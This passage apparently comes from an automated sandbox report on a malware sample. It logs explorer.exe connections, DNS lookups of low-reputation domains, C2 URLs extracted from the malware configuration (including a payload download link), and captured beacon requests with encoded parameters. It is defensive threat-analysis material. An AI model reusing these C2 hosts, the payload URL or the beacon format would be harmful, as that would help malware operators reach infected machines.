Source: C:\Windows\explorer.exe	Network Connect: 216.250.120.206 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.117.168.233 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.98.5.234 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 44.227.76.166 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 50.118.200.120 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.68.16.57 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.23.172.127 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.237.47.210 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.59.242.153 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.29.140.185 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.61.153.97 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 81.2.194.128 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 203.170.80.250 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 164.155.212.139 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.82.227 80	Jump to behavior

Performs DNS queries to domains with low reputation

Show sources

Source:	DNS query: www.receiptpor.xyz
Source:	DNS query: www.dif-directory.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.gdav130.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.ozattaos.xyz
Source:	DNS query: www.smartam6.xyz
Source:	DNS query: www.yghdlhax.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.braxtynmi.xyz

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin
Source: Malware configuration extractor	URLs: www.ayudavida.com/n8ds/

Tries to resolve many domain names, but no domain seems valid

Show sources

Source: unknown	DNS traffic detected: query: www.smartam6.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.tvterradafarinha.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.wordpresshostingblog.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.abcjanitorialsolutions.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: www.recruitresumelibrary.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.testwebsite0711.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.yghdlhax.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.talkingpoint.tours replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.braxtynmi.xyz replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: www.cmoigus.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.csenmoga.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.3uwz9mpxk77g.biz replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: www.photon4energy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.jobl.space replaycode: Name error (3)

Source: Joe Sandbox View

ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4 HTTP/1.1Host: www.ayudavida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.quickcoreohio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=HP3lUcly75+aK0axQNs5BYQcBP4O+AKLEkTZ4laoLz9/Sn12VzNllTYHErR4gbC1MkpJ&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.luxalbridi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr HTTP/1.1Host: www.apps365.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=tFWpUqTJBKKZjj7mpmRmO+UO9YCEuI1l6CuT88R3V9vk9mUNjYvQT6q9cPheoq+XMEYl&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.receiptpor.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=f/B16EdvHg/4mql2vq5Md1sx/t71Njj4R8zlekrOfJu06zuLM7yaFZuMLQOQaJsZfcYK HTTP/1.1Host: www.writingmomsobitwithmom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.growebox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.quickcoreohio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=Sj2jHWqmlaqVQSbjgunx+H7yNQtdqjg6ckEoQlWTrRUvY2HVGecaPyLp6mXUMYnymgSe&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.dczhd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?pB=z2JtXhtxAhidvN&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1Host: www.gdav130.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.dubaicars.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?pB=z2JtXhtxAhidvN&gHl=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?3fIl1=6lYt5jhP&gHl=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j HTTP/1.1Host: www.ozattaos.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&3fIl1=6lYt5jhP HTTP/1.1Host: www.littlefishth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1 HTTP/1.1Host: www.fatima2021.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs HTTP/1.1Host: www.dubaicars.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=B50h1ADlVgBVReAtZzXZoMMEQCBylsFCBP4nBu/XE2swHcOtDXvVzvqty7hRo1ZxzC15&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.heyvecino.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1Host: www.gdav130.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.apps365.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4 HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 198.54.117.217 198.54.117.217

Source: unknown

Network traffic detected: DNS query count 36

Source: global traffic

HTTP traffic detected: GET /GHDFR/bin_rOlFDOAa61.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: statuswar.infoCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 01 Dec 2021 09:34:09 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Wed, 01 Dec 2021 09:34:25 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Dec 2021 09:35:46 GMTContent-Type: text/htmlContent-Length: 146Connection: closeSet-Cookie: security_session_verify=eacd4aa794019e81ab3f3becff0d4bcf; expires=Sat, 04-Dec-21 17:35:46 GMT; path=/; HttpOnlyData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 01 Dec 2021 09:37:09 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be735-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 01 Dec 2021 09:39:17 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Dec 2021 09:39:56 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>

Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
